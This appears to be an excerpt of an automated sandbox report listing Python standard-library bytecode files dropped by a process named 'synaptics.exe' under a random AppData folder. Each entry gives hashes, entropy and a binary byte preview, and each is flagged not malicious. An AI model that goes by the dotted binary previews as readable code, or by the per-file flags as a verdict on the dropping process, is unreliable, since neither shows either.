                                                                                                                                                                                                            SHA1:D606F273EE9E0365B7E523226FB333F800009523
                                                                                                                                                                                                            SHA-256:02FC98423794AD43561D300A66C4FD6EE074B6F8237B8C9DC0BB249D1F1250AB
                                                                                                                                                                                                            SHA-512:49548F7CA1E0656AE3BCA6F056865132F039475A983FAAC619BBFED28A69A109F375D06D52CA1C9B96FBE8F06D53A74B66D091D974B862CF44BF73105D66B1CD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.N.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.d...Z.e.d.g.d.....Z.d.e._.e.j.d.k.rId.e.j._.d.e.j._.d.e.j._.d.e.j._.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...r.G.d.d...d.e...Z.e.e.d ..r.G.d!d"..d"e...Z.e.e.d#..r.G.d$d%..d%e...Z.e.e.d&..r.G.d'd(..d(e...Z.d)d*..Z.e.d&..r.e.Z.d.S.e.d ..r.e.Z.d.S.e.d#..r.e.Z.d.S.e.d...r.e.Z.d.S.e.Z.d.S.)+z|Selectors module...This module allows high-level and efficient I/O multiplexing, built upon the.`select` module primitives.......)...ABCMeta..abstractmethod)...namedtuple)...MappingN..........c....................C...s`...t.|.t...r.|.}.n.z.t.|.......}.W.n...t.t.t.f.y"......t.d...|.....d...w.|.d.k.r.t.d...|.......|.S.).z.Return a file descriptor from a file object... Parameters:. fileobj -- file object or file descriptor.. Returns:. corresponding file descriptor.. Raises:. ValueError if the object is invalid. z.I
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7806
                                                                                                                                                                                                            Entropy (8bit):5.513146744149605
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mQrdt23n7sJQxhSaL09FKXY5nzg9gn1yiEWE5cnPrrvX:5rswJb9FKo5zg9g1yLZ6Pf
                                                                                                                                                                                                            MD5:6F459B72E057D594ED3EE67902D4D5A9
                                                                                                                                                                                                            SHA1:ACDD8E1C7C639AFB7FF7909A220BCD3C2AE8FCEF
                                                                                                                                                                                                            SHA-256:B8E72C08B2805955B66F8C7981D9214D4B2224F8196C0C97181058DCF29521DC
                                                                                                                                                                                                            SHA-512:FE01E0E950C31DB4306F8FC801E8314818835DC56D0DA0E8417BA961DD74A2D699A0898F1AAA87DE288477A37B464B797EE92D8176F0D97911E1DBC52AB504A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.e...d.e.j...j.Z.d.d...Z.d.d...Z.e.d.k.rse.e.j...d.k.rPe.e.......d.S.e.j.d...Z.e.e.....Z.e.e.e.e.......W.d.........d.S.1.slw.......Y...d.S.d.S.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc....................@...sv...e.Z.d.Z.d.Z.....d.d.d...Z.e.d.d.....Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).r....r....NFc....................C...s....t.|.t...r.t.|...}.|.d.u.r.|.|._.|.|._.n.t.j.|._.d.|._.|.|._.|.r$d.|._.n.d.|._.d.|._.d.|._.|.j.r7|...j.d.7..._.d.|._.d.|._.d.|._.d.|._.d.|._.d.|._.t...|._.d.|._.d.|._.d.|._.t...|._.d.|._.|.sbd.}.n.|.d.u.rhd.}.|.|._.|.r.t...|._.|...j.d.7..._.|.j...t...|.....}.|.j...|...|._.d.S.d.S.).N....#Z?abcdfeghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_u|..............................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7806
                                                                                                                                                                                                            Entropy (8bit):5.513146744149605
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mQrdt23n7sJQxhSaL09FKXY5nzg9gn1yiEWE5cnPrrvX:5rswJb9FKo5zg9g1yLZ6Pf
                                                                                                                                                                                                            MD5:6F459B72E057D594ED3EE67902D4D5A9
                                                                                                                                                                                                            SHA1:ACDD8E1C7C639AFB7FF7909A220BCD3C2AE8FCEF
                                                                                                                                                                                                            SHA-256:B8E72C08B2805955B66F8C7981D9214D4B2224F8196C0C97181058DCF29521DC
                                                                                                                                                                                                            SHA-512:FE01E0E950C31DB4306F8FC801E8314818835DC56D0DA0E8417BA961DD74A2D699A0898F1AAA87DE288477A37B464B797EE92D8176F0D97911E1DBC52AB504A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.e...d.e.j...j.Z.d.d...Z.d.d...Z.e.d.k.rse.e.j...d.k.rPe.e.......d.S.e.j.d...Z.e.e.....Z.e.e.e.e.......W.d.........d.S.1.slw.......Y...d.S.d.S.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc....................@...sv...e.Z.d.Z.d.Z.....d.d.d...Z.e.d.d.....Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).r....r....NFc....................C...s....t.|.t...r.t.|...}.|.d.u.r.|.|._.|.|._.n.t.j.|._.d.|._.|.|._.|.r$d.|._.n.d.|._.d.|._.d.|._.|.j.r7|...j.d.7..._.d.|._.d.|._.d.|._.d.|._.d.|._.d.|._.t...|._.d.|._.d.|._.d.|._.t...|._.d.|._.|.sbd.}.n.|.d.u.rhd.}.|.|._.|.r.t...|._.|...j.d.7..._.|.j...t...|.....}.|.j...|...|._.d.S.d.S.).N....#Z?abcdfeghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_u|..............................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38385
                                                                                                                                                                                                            Entropy (8bit):5.531767143289951
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:B6QoETanIk41k7RiruyBW6rZiFuTPgtyQwye+idEd4jalseGehtq:B6QoEMIBddYATPgtyQwye+idEd4useGr
                                                                                                                                                                                                            MD5:0C59F8221A32CB3615DC7EF000FFA338
                                                                                                                                                                                                            SHA1:177E27461D3CCAC987BBF7969D4418DE1AC5AF2A
                                                                                                                                                                                                            SHA-256:E81837C4D4A0119D31DA3498D076407A07B4998BB511A1A45B150D23FD707C2A
                                                                                                                                                                                                            SHA-512:BD79FA67A94220CAC555078875597A6778B3062654261A730377188129E582DFA210D5BA6486579101ABFD02619B7F1D074F6F20F86BE22DD75A6651730AB40F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s"...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.[.d.Z.W.n...e.y.......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yC......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yX......d.Z.Y.n.w.e.j.d.k.Z.d...Z.Z.e.j.d.k.rld.d.l.Z.n.e.rrd.d.l.Z.e.rvd.n.d.Z.e.e.d...o.e.j...d...a.e.o.e.e.d...Z.d.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"d.d...Z#d.d...Z$e.f.d d!..Z%d.d"d#..Z&d$d%..Z'd&d'..Z(d(d)..Z)d.d*..d+d,..Z*d.d*..d-d...Z+e.e.d/....r.d.d*..d0d1..Z,n.d2d1..Z,d.d*..d3d4..Z-d.d*..d5d6..Z.d.d*..d7d8..Z/d9d:..Z0..d.d;d<..Z1d.d.e/d.d.f.d=d>..Z2e.e.j3d?....r@d@dA..Z4dBdC..Z5n.dDdA..Z4dEdC..Z5dFdG..Z6dHdI..Z7e.j8e.j.e.j9e.j:h.e.j;k...oje.j<e.j=v...oje.j.e.j>v.Z?d.dJdK..Z@e?e@_AdLdM..ZBe/f.dNdO..ZCdPdQ..ZDdRdS..ZEdTdU..ZFdVdW..ZG....d.dYdZ..ZH....d.d[d\..ZId]eHd^g.d_d.f.i.ZJe...r.eHd`g.dad.f.eJdb<.eIg.dcd.f.eJdd<.e...r.eHdeg.dfd.f.eJdg<.e...r.eHdhg.did.f.eJdj<.dkdl..ZKd.dndo..ZLdpdq..ZM
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2959
                                                                                                                                                                                                            Entropy (8bit):4.885970071996527
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l0ynPssxfA01vMnyiwQQDGnvsSZdCztcKcynJyDywm18XQfkt+A7BN5XjyubuOAh:/UshAkuynrGvsqG6PiJyDywmcQq+A7DU
                                                                                                                                                                                                            MD5:756BBA13F15A8F0D84D1F3435FEC15AB
                                                                                                                                                                                                            SHA1:2482CFFBD7AC4AA147D24DF42082BAFAD7A47BDE
                                                                                                                                                                                                            SHA-256:48A978DBA8E6C533B5EB9DE9C27316D24D61192D37BB7708493198E95523865E
                                                                                                                                                                                                            SHA-512:8571EDD193CDE72AE2813C3C422C4B046B117939710E3AEDC65084554A9C5F778A404356F38030B22F9309372324289C83B6EB363457CFB362A6C268EF2C314C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...Z.e...d.e.d.d.......e...d.e.d.d.......d.e.v.r0e...d.e.d.d.......d.d...Z.d.d...Z.d.d...Z.e.e.j...d.d.....Z.e.e.j...d.d.....Z.d.e.v.r[e.e.j...d.d.....Z.d.e.v.rhe.e.j...d.d.....Z.d.e.v.rue.e.j...d.d.....Z.d.e.v.r.e.e.j...d.d.....Z.[.[.d.S.)......N)...*)...IntEnum..Signalsc....................C...s(...|.....r.|...d...o.|...d.....p.|...d...S.).NZ.SIGZ.SIG_Z.CTRL_)...isupper..startswith....name..r.....5C:\Users\user\AppData\Local\xFSOj9El1Q\lib\signal.py..<lambda>....s............r......Handlersc....................C........|.d.v.S.).N)...SIG_DFL..SIG_IGNr....r....r....r....r....r.................pthread_sigmaskZ.Sigmasksc....................C...r....).N).Z.SIG_BLOCKZ.SIG_UNBLOCKZ.SIG_SETMASKr....r....r....r....r....r........r....c....................C...s"...z.|.|...W.S...t.y.......|...Y.S.w.).zsConvert a numeric value to an IntEnum member.. If it's not a known member, return the numeric value itself.. )...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17404
                                                                                                                                                                                                            Entropy (8bit):5.511397919017041
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Dlp9Tn42l1YP47TUN1PirJtKA5y15/Jgt1nmKQ1ruVhY2lrD9bIhx/xAUu2n8/X1:lL42l+g7TA1Pi9cA015hgt1nmlUvvlrx
                                                                                                                                                                                                            MD5:DC3396AD7E4BB23866F885FE36828E60
                                                                                                                                                                                                            SHA1:19C78C2ABFFBA54E2C14D223CF3BF51CFAC771DF
                                                                                                                                                                                                            SHA-256:380D5111ED99783D37F17A5C1BF3A9D6FA4473EEEE006F5EA689B7E54F86359D
                                                                                                                                                                                                            SHA-512:7934C4E96ABB514CAB69D1EB3F0CD598A5DD060C41BE708FA04952D518B59DA6D2AD29ADD21E8A0934C8C9DAD97AA1AAC53E7867DAE23259376F6690FD8D36F6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.j.g.a.d.a.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d4d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/d0..Z"e.j#j$s.e"....d1d2..Z%e&d3k.r.e%....d.S.d.S.)5a....Append module search paths for third-party packages to sys.path...****************************************************************.* This module is automatically imported during initialization. *.****************************************************************..This will append site-specific paths to the module search path. On.Unix (including Mac OSX), it starts with sys.prefix and.sys.exec_prefix (if different) and appends.lib/python<version>/site-packages..On other platforms (such as Windows), it tries each of the.prefixes directly, as well as with lib/site-packages appended. The.resulting directories, if they exist, are appended to
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28987
                                                                                                                                                                                                            Entropy (8bit):5.53552893159753
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:0twxW9l/P/XkfjdJRP8zqEhlM+Se4EwQ04PmNn9N:0OxmpQ6z3hlGe4EwQ0uc9N
                                                                                                                                                                                                            MD5:11C130544F0BEA206958A9A05F256B61
                                                                                                                                                                                                            SHA1:DE7AF2B1EDADB8501F6DD6E5045B23DB40A938FE
                                                                                                                                                                                                            SHA-256:694BEE3F9C6EE9610B184EF1CD17E18EDB6C9EE09FFA782F37CD272745BA9B1C
                                                                                                                                                                                                            SHA-512:E3A41A0ACF815F6B2D338EED753831C07657673B8049E602EE580EEFAE4038689F9D0ABCE2F2E23543C790C50EEBB741E8DCD0B3BCC48C8AB887E08419378B74
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dq........................@...sT...d.Z.d.d.l.Z.d.d.l.T.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...z.d.d.l.Z.W.n...e.y3......d.Z.Y.n.w.e.e.d.d...Z.e.e.d.d...Z.e.e.d.d...Z.g.d...Z.e...e...e.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......d.Z.d.Z.d.d...Z.e.j.......d.....r.i.Z.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d <.d!e.d"<.d#e.d$<.d%e.d&<.d'e.d(<.d)e.d*<.d+e.d,<.d-e.d.<.d/e.d0<.d1e.d2<.d3e.d4<.d5e.d6<.d7e.d8<.d9e.d:<.d;e.d<<.d=e.d><.d?e.d@<.dAe.dB<.dCe.dD<.dEe.dF<.dGe.dH<.dIe.dJ<.dKe.dL<.dMe.dN<.dOe.dP<.dQe.dR<.dSe.dT<.dUe.dV<.dWe.dX<.dYe.dZ<.d[e.d\<.d]e.d^<.d_e.d`<.dae.db<.dce.dd<.dee.df<.dge.dh<.die.dj<.dke.dl<.dme.dn<.doe.dp<.dqe.dr<.dse.dt<.due.dv<.dwe.dx<.dye.dz<.d{e.d|<.d}e.d~<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15218
                                                                                                                                                                                                            Entropy (8bit):5.609478703746726
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:pyz34fmVm0PVclj2zdkPUdGHUawOXL1T6MQwo39h5OjuMxK67zG:pynV8j8KMdv4h6nwoNDO3xK67zG
                                                                                                                                                                                                            MD5:90EA0A0C8A44A245D07AA2DDDC2743FF
                                                                                                                                                                                                            SHA1:EE3AB78758B84C6A7780FDE7B36B9C29BD1FC370
                                                                                                                                                                                                            SHA-256:F4AE1770260F3C99FDB1B7ECCC455CA303219B3509054426BA9CBD70B859DA5C
                                                                                                                                                                                                            SHA-512:C6DE45669BCBBAE8F3FF544D34ABAA9C91C700B73F209D710359B06253788690065CBAE7237F260516D2109F6080A9A48218885BFE3C65B270833D15F111EC43
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dmp.......................@...s$...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.e.j.e.k.s.J.d.....e.e.h.Z.e.e.e.h.Z.e.e.h.Z.e.e.h.Z.e.e.e.h.B.Z.d.Z.d.d...e.D...Z.e.j.f.d.d...Z.d.d...Z.d.d...Z.d-d.d...Z.e.j.d...Z.d.e.>.d...Z.d.Z.e.e f.d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%d.d...Z&d.d ..Z'd!d"..Z(d#d$..Z)d%d&..Z*d'd(..Z+d)d*..Z,d.d+d,..Z-d.S.)/z.Internal support module for sre.....N)...*z.SRE module mismatch).)..i...i1...)..s...i....).....i....).iE...i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i2...i....).i4...i....).i>...i....).iA...i....).iB...i....i....).iJ...i....).ic...i....).i....iK...).ia...i....).i....i....c........................s....i.|.].}.|.D.].....t...f.d.d...|.D.......q.q.S.).c....................3...s......|.].}...|.k.r.|.V...q.d.S...N..)....0..j....ir.....:C:\Users\user\AppData\Local\xFSOj9El1Q\lib\sre_compile.py..<genexpr>N...s........z.<dictcomp>.<genexpr>)...tuple).r......tr....r....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6381
                                                                                                                                                                                                            Entropy (8bit):5.777986479503165
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:V7jrG4iQ2AaI2Ym9PqQBI1I1dadE1ff7l17mwvYhaSEZ84C:VM9OIdNfT6E8
                                                                                                                                                                                                            MD5:96F37B23354116A9AADE7ADC3C2F10F7
                                                                                                                                                                                                            SHA1:CE9CA291A03383ACB78A581C681FAC51D5940212
                                                                                                                                                                                                            SHA-256:8A01649349D422C9F478D1638FC525A60483D9A8446046006531CF0B52A5C3F4
                                                                                                                                                                                                            SHA-512:A4343CE1F552B210EC22732E6791528237A105A0F6C6F8A588DCC759D0A6798DFDD6157FD645FE088C19D6F5291D4FB19A24B87179DAA9B445F20C9046F814E6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s^...d.Z.d.Z.d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...Z.d.d...Z.e.d...Z.e.d.d...=.e.d...Z.e.d...Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e i.Z!e.e"e.e#i.Z$e%e%e&e&e'e'e(e(e)e*e+e,e-e-e.e.i.Z/e%e0e&e1e'e2e(e3e)e4e+e5e-e6e.e7i.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDeEd.k...r-d.d...ZFeGd.d....zZHeH.Id.....eH.Id.e.......eFeHe.d ....eFeHe.d!....eFeHe.d!....eH.Id"e9......eH.Id#e:......eH.Id$e;......eH.Id%e<......eH.Id&e=......eH.Id'e>......eH.Id(e?......eH.Id)e@......eH.Id*eA......eH.Id+eB......eH.Id,eC......eH.Id-eD......W.d.........n.1...s"w.......Y...eJd.....d.S.d.S.)/z.Internal support module for srei..3......)...MAXREPEAT..MAXGROUPSc........................s&...e.Z.d.Z.d.Z.d.Z.d...f.d.d...Z.....Z.S.)...errorai...Exception raised for invalid regular expressions... Attributes:.. msg: The unformatted error message. pattern: The regular expression pattern. pos: The index in the pattern
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21779
                                                                                                                                                                                                            Entropy (8bit):5.596308317894776
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:BiQ5DWum7nnQBcNr5ZjTL2xsP6HeYHfS/l2b7tAu9o23kZAt2umjtU30TezUpPB9:BiG5K2I6+YKd2b7tX3AAt2usyUx0lI
                                                                                                                                                                                                            MD5:2B4E40C7FF81F20AF70B8A550504F9C5
                                                                                                                                                                                                            SHA1:CD0454BEE7434D14EA9B0F4DE01DAF0F23CE4405
                                                                                                                                                                                                            SHA-256:0B0EC60FD451E3A64DCA3E69006B5C28848E238CE5BC7224466467C5301C160C
                                                                                                                                                                                                            SHA-512:D2271B2BBB3F5DEF106CD16BB2F14E4AA28E8538A069522A5A56C8EEF705F4043F990304E278ED31091E252A885635D9B6EAB413DB6F9536D119629C0E1C5C41
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.T.d.Z.d.Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.e.e.h...Z.e.e.e.e.e.e.e.h...Z.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.d...Z.e.e.f.e.e.f.e.e.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e f.d...Z!e"e#e$e%e&e'e(e)d...Z*e'e#B.e)B.Z+e,e(B.Z-G.d.d...d.e...Z/G.d.d...d...Z0G.d.d...d...Z1G.d.d...d...Z2d.d...Z3d.d ..Z4d!d"..Z5d#d$..Z6d3d&d'..Z7d(d)..Z8d*d+..Z9d4d-d...Z:d/d0..Z;d1d2..Z<d,S.)5z.Internal support module for sre.....)...*z..\[{()*+?^$|z.*+?{Z.0123456789Z.01234567Z.0123456789abcdefABCDEFZ4abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZz. ............................\).z.\a..\bz.\fz.\nz.\rz.\tz.\vz.\\).z.\Ar....z.\Bz.\dz.\Dz.\sz.\Sz.\wz.\Wz.\Z)...i..L..m..s..x..a..t..uc....................@...s....e.Z.d.Z.d.S.)...VerboseN)...__name__..__module__..__qualname__..r....r.....8C:\Users\user\AppData\Local\xFSOj9El1Q\lib\sre_parse.pyr....G...s........r....c
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44844
                                                                                                                                                                                                            Entropy (8bit):5.571029216641341
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:h653tgqHiJVJd4LRmQPAMN4FM81OVgTkC5Nq9F6:h63tBCJDy9T9NCUM1rqb6
                                                                                                                                                                                                            MD5:9D9E1F026DB26CE3E584EF53D459603D
                                                                                                                                                                                                            SHA1:908B3BD0AE1F942D961EDCEF4C6E2B4F144ECAE1
                                                                                                                                                                                                            SHA-256:635CBB5030224FEC77F4CD903BFAD8AEB53F28DFF9E0E2D93D60C7B114EF0A25
                                                                                                                                                                                                            SHA-512:119C24C021E9908CC4541F6BE987916914F0C5719EC79A74AA5D8FC6117E161463531C4CE39126986A95D817202B4717B1E5A6DB0756C275B85032D69445EF0C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z m!Z!..z.d.d.l.m"Z"..W.n...e#yi......Y.n.w.d.d.l.m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-..d.d.l.m.Z.m/Z/..e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e2j3..Z4e2_4d.d...e2j5.6..D...Z7e8e2d.d...Z9G.d.d...d.e...Z:G.d d!..d!e...Z;G.d"d#..d#e...Z<G.d$d%..d%e...Z=e.j>d&k...r.d.d'l.m?Z?m@Z@..d.d(lAmAZAmBZBmCZC..d.d)lAmDZDmEZEmFZF..d.d.lAZGd.d.lHZHd.d.lIZId.d.lJZJeKZLd*g.ZMeNe.d+..ZOe.ZPe.ZQd,d-..ZRd.d/..ZSd0d1..ZTd2d3..ZUe.d4d5..ZVd6d7..ZWG.d8d9..d9e.d9d:....ZXG.d;d<..d<eXe...ZYG.d=d>..d>e...ZZeYj[f.d.d.d.d?..d@dA..Z\d[e]dBeYj[d.d.d.d.d.dC..dDdE..Z^e\Z_e^Z`G.dFdG..dG..ZadHdI..ZbG.dJdK..dKeA..ZceceZ_deaeZ_ed.d.dBe]e3d.dLdLd.f.dMdN..ZfdOdP..ZgdQZhdRZidSdT..ZjdUdV..Zkeld.eFf.dWdX..ZmdYdZ..Znd.S.)\
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4297
                                                                                                                                                                                                            Entropy (8bit):5.54691676295517
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Wn/f+60wN3EXH9/aowjk0wBoCAEFXOrW6QBeABPl:WeRy3EVBwjk0w+CFXefQBT
                                                                                                                                                                                                            MD5:72F5078E63B50E0175F3429C19A5422A
                                                                                                                                                                                                            SHA1:3EA4971AB966D2400D9AE9027AAF6572B299A8FA
                                                                                                                                                                                                            SHA-256:79F42449E6F2F4B5DE58DE39008786911ADFF171A3099E154353B676A9E9AAED
                                                                                                                                                                                                            SHA-512:568978FDCDA06F1458F4E34963F89B76511F2F5205739513A3216633826F0A08AFECADDBB547FA0737873AE6E4F4B12AC6BCDD0149075413343FE93DDC4773C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d0........................@...sJ...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z d*Z!d+Z"e"Z#d,Z$d-Z%d.Z&d/Z'd0Z(d-Z)d.Z*d/Z+d1Z,d2Z-d3Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d3Z8d2Z9d.Z:d4Z;d5Z<d6Z=d7Z>d8Z?e.d9f.e.d:f.e.d;f.e.d<f.e.d=f.e.d>f.e.d?f.f.e)d@f.f.e*dAf.f.e+e!B.d:f.e!dBf.e+dCf.f.e-d@f.f.e.dAf.f.e/e"B.d:f.e"dBf.e/dCf.f.e1d@f.f.e2dAf.f.e3e$B.dDf.e$dEf.e3dCf.f.f.Z@dFdG..ZAd2ZBd*ZCd/ZDd3ZEd.ZFd.ZGd.ZHd.ZId.ZJd5ZKd.ZLd.ZMd+ZNd,ZOd.ZPd-ZQd4ZRz.d.dHlST.W.dIS...eT..y$......Y.dIS.w.)JzoConstants/functions for interpreting results of os.stat() and os.lstat()...Suggested usage: from stat import *...................................................c....................C........|.d.@.S.).zMReturn the portion of the file's mode that can be set by. os.chmod().. i..........moder....r.....3C:\Users\user\AppData\Local\xFSOj9El1Q\lib\stat.py..S_IM
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
